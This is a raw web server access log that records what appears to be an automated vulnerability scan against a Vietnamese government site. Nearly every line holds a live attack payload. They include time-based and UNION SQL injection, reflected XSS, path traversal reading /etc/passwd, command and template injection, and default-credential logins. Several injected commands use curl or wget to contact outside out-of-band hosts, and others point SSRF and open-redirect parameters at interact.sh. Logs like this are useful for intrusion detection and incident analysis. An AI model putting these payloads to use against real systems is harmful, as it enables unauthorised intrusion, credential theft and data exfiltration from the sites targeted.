/fuel/login/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 1107 2023-11-09 21:48:18 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpoc - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 11 0 366 2023-11-09 21:48:20 103.153.214.94 POST /fuel/login/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 360 2023-11-09 21:48:22 103.153.214.94 GET /fuel/pages/items/ search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn 200 0 0 361 2023-11-09 21:48:49 103.153.214.94 GET /weibo/topic/</script><script>alert(document.domain)</script> - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 363 2023-11-09 21:49:40 103.153.214.94 GET /fhem/FileLog_logWrapper dev=Logfile&file=%2fetc%2fpasswd&type=text 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 368 2023-11-09 21:49:51 103.153.214.94 GET /control/stream contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 380 2023-11-09 21:50:15 103.153.214.94 GET /install/index.php step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/> 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 362 2023-11-09 21:50:38 103.153.214.94 GET /tests/support/stores/test_grid_filter.php query=echo%20md5%28%22CVE-2020-19625%22%29%3B 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 366 2023-11-09 21:50:48 103.153.214.94 GET /user/login.php - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 xss"/><img+src="#"+onerror="alert(document.domain)"/> 200 0 0 362 2023-11-09 21:51:24 103.153.214.94 POST /public/index.php/home/index/bind_follow/ publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 380 2023-11-09 21:52:17 103.153.214.94 GET /gitlab/build_now</script><script>alert(document.domain)</script> - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 371 2023-11-09 21:52:41 103.153.214.94 GET /passport/index.php action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 363 2023-11-09 21:54:01 103.153.214.94 POST /forgot_password.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 370 2023-11-09 21:55:03 103.153.214.94 POST /login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 bcvt.kontum.gov.vn/module/login/login.html 405 0 1 366 2023-11-09 21:55:17 103.153.214.94 GET /plus/ajax_common.php act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 364 2023-11-09 21:55:36 103.153.214.94 GET /whoAmI/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 363 2023-11-09 21:55:39 103.153.214.94 GET /plus/ajax_street.php act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 363 2023-11-09 21:55:40 103.153.214.94 GET /whoAmI/ - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 361 2023-11-09 21:55:51 103.153.214.94 GET /plus/ajax_officebuilding.php act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 364 2023-11-09 21:56:18 103.153.214.94 GET /plus/ajax_street.php act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1103 2023-11-09 21:56:34 103.153.214.94 GET /email_passthrough.php email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 418 2023-11-09 21:56:55 103.153.214.94 GET /descriptorByName/AuditTrailPlugin/regexCheck value=*j%3Ch1%3Esample 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 397 2023-11-09 21:57:00 103.153.214.94 GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck value=*j%3Ch1%3Esample 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 365 2023-11-09 21:57:21 103.153.214.94 GET / url=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 370 2023-11-09 21:59:11 103.153.214.94 POST /wp-admin/admin-ajax.php action=moove_read_xml 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 366 2023-11-09 21:59:44 103.153.214.94 GET /contact.php theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 1120 2023-11-09 22:00:12 103.153.214.94 GET /login/ uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 1110 2023-11-09 22:00:15 103.153.214.94 GET / uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 371 2023-11-09 22:00:16 103.153.214.94 GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 366 2023-11-09 22:00:40 103.153.214.94 GET / - 443 - 15.204.183.219 - - 200 0 0 267 2023-11-09 22:00:43 103.153.214.94 GET / p=1 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 366 2023-11-09 22:01:00 103.153.214.94 POST /index.php option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 365 2023-11-09 22:01:03 103.153.214.94 POST /index.php option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 360 2023-11-09 22:01:28 103.153.214.94 GET /find_v2/_click _t_id&_t_q&_t_hit.id&_t_redirect=https://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 364 2023-11-09 22:02:55 103.153.214.94 POST /carbon/generic/save_artifact_ajaxprocessor.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 1401 2023-11-09 22:03:34 103.153.214.94 GET /CuteSoft_Client/CuteEditor/Template.aspx Referrer=XSS";><script>alert(document.domain)</script> 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 366 2023-11-09 22:03:47 103.153.214.94 GET /index.php action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 364 2023-11-09 22:04:04 103.153.214.94 GET /config/getuser index=0 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 361 2023-11-09 22:04:25 103.153.214.94 GET /infusions/downloads/downloads.php cat_id=${system(ls)} 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 1103 2023-11-09 22:04:57 103.153.214.94 POST /var - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 391 2023-11-09 22:04:57 103.153.214.94 POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 361 2023-11-09 22:05:05 103.153.214.94 GET /cgi-bin/manlist section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/2XwZKvl2bMlQCGZSAYwh080vye7/)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 365 2023-11-09 22:05:18 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 368 2023-11-09 22:05:22 103.153.214.94 GET /cgi-bin/execute_cmd.cgi timestamp=1589333279490&cmd=cat%20/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 363 2023-11-09 22:05:46 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 376 2023-11-09 22:05:50 103.153.214.94 POST /checkValid - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 362 2023-11-09 22:05:55 103.153.214.94 GET /public/css/2XwZKmd685S6GDTpPcBcVyOGHLv.css - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 367 2023-11-09 22:06:31 103.153.214.94 GET /console/login/LoginForm.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 364 2023-11-09 22:07:41 103.153.214.94 GET /admin.html s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 0 2 369 2023-11-09 22:07:41 103.153.214.94 POST /cgi-bin/system_mgr.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 363 2023-11-09 22:07:43 103.153.214.94 POST /cgi-bin/system_mgr.cgi C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 363 2023-11-09 22:07:44 103.153.214.94 POST /assets/_core/php/profile.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 370 2023-11-09 22:07:48 103.153.214.94 POST /assets/php/profile.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 361 2023-11-09 22:07:51 103.153.214.94 POST /vendor/qcubed/qcubed/assets/php/profile.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 387 2023-11-09 22:09:14 103.153.214.94 GET /dataservice/etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 1102 2023-11-09 22:09:52 103.153.214.94 GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 366 2023-11-09 22:10:08 103.153.214.94 PUT /v1/kv/2XwZKtpsrbpjfrSexR63sTZTeR0 - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 366 2023-11-09 22:10:08 103.153.214.94 GET /api/config - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 0 2 2087 2023-11-09 22:10:12 103.153.214.94 GET /v1/kv/2XwZKtpsrbpjfrSexR63sTZTeR0 raw 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 364 2023-11-09 22:10:51 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 371 2023-11-09 22:11:47 103.153.214.94 POST /api/graphql - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 0 2 6530 2023-11-09 22:11:48 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 368 2023-11-09 22:11:52 103.153.214.94 GET /wp-json/wp/v2/lesson/1 - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 364 2023-11-09 22:11:58 103.153.214.94 POST /login.htm - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 362 2023-11-09 22:12:13 103.153.214.94 GET /Items/RemoteSearch/Image ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 370 2023-11-09 22:12:33 103.153.214.94 GET /index.php fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 363 2023-11-09 22:12:43 103.153.214.94 GET /manage/fileDownloader sec=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 369 2023-11-09 22:13:00 103.153.214.94 GET /index.php page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 364 2023-11-09 22:13:18 103.153.214.94 GET /pme/media/ - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 388 2023-11-09 22:13:39 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 369 2023-11-09 22:13:45 103.153.214.94 GET /index.php download=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 361 2023-11-09 22:14:39 103.153.214.94 GET /help/english/index.html javascript:alert(document.domain) 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 364 2023-11-09 22:15:22 103.153.214.94 GET /setup.cgi todo=debug&x=currentsetting.htm 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 363 2023-11-09 22:15:47 103.153.214.94 GET /webmail/ language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 365 2023-11-09 22:15:47 103.153.214.94 GET /api/settings/values - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 740 2023-11-09 22:18:01 103.153.214.94 POST /api/v1/method.callAnon/sendForgotPasswordEmail - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 2096 2023-11-09 22:18:58 103.153.214.94 GET /tos/index.php user/login 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 393 2023-11-09 22:19:02 103.153.214.94 POST /wizard/initialise.php - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn/tos/index.php?user/login 405 0 1 1482 2023-11-09 22:19:51 103.153.214.94 GET /pacs/login.php message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 389 2023-11-09 22:20:15 103.153.214.94 GET /include/makecvs.php Event=%60curl+http%3a//cl6fbhsfe7k9sg331pog6x6nyiy369ie1.oast.pro+-H+'User-Agent%3a+hhgw3f'%60 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 364 2023-11-09 22:20:17 103.153.214.94 GET /addons/ q=%3Csvg%2Fonload%3Dalert(1)%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 361 2023-11-09 22:20:20 103.153.214.94 GET /tos/index.php explorer/pathList&path=%60curl+http%3a//cl6fbhsfe7k9sg331pogsurzm7xq8sa4b.oast.pro+-H+'User-Agent%3a+hhgw3f'%60 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 360 2023-11-09 22:20:33 103.153.214.94 GET /index.php page=/etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 1110 2023-11-09 22:20:53 103.153.214.94 GET /dashboard/view-chair-list.php table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 371 2023-11-09 22:21:24 103.153.214.94 GET /+CSCOE+/session_password.html - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 11 0 821 2023-11-09 22:21:48 103.153.214.94 POST /assets/php/upload.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 http://bcvt.kontum.gov.vn 405 0 1 388 2023-11-09 22:21:55 103.153.214.94 GET /assets/data/usrimg/2xwzlisawcw5cgu4iuvaniacdkm.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 363 2023-11-09 22:22:46 103.153.214.94 GET / username=zyfwp&password=PrOw!aN_fXp 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 365 2023-11-09 22:22:49 103.153.214.94 GET /ext-js/index.html - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 374 2023-11-09 22:22:53 103.153.214.94 GET /server/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 363 2023-11-09 22:23:11 103.153.214.94 GET /wp-content/plugins/contact-form-7/readme.txt - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 1135 2023-11-09 22:23:14 103.153.214.94 POST /incom/modules/uploader/showcase/script.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 388 2023-11-09 22:23:17 103.153.214.94 GET /upload/userfiles/image/2XwZKPZzMA66PnyLPTdD5ifvazm.png - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 363 2023-11-09 22:23:25 103.153.214.94 GET /q start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cl6fbhsfe7k9sg331pog9j8bk57fiygc1.oast.pro%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json 443 - 101.35.195.134 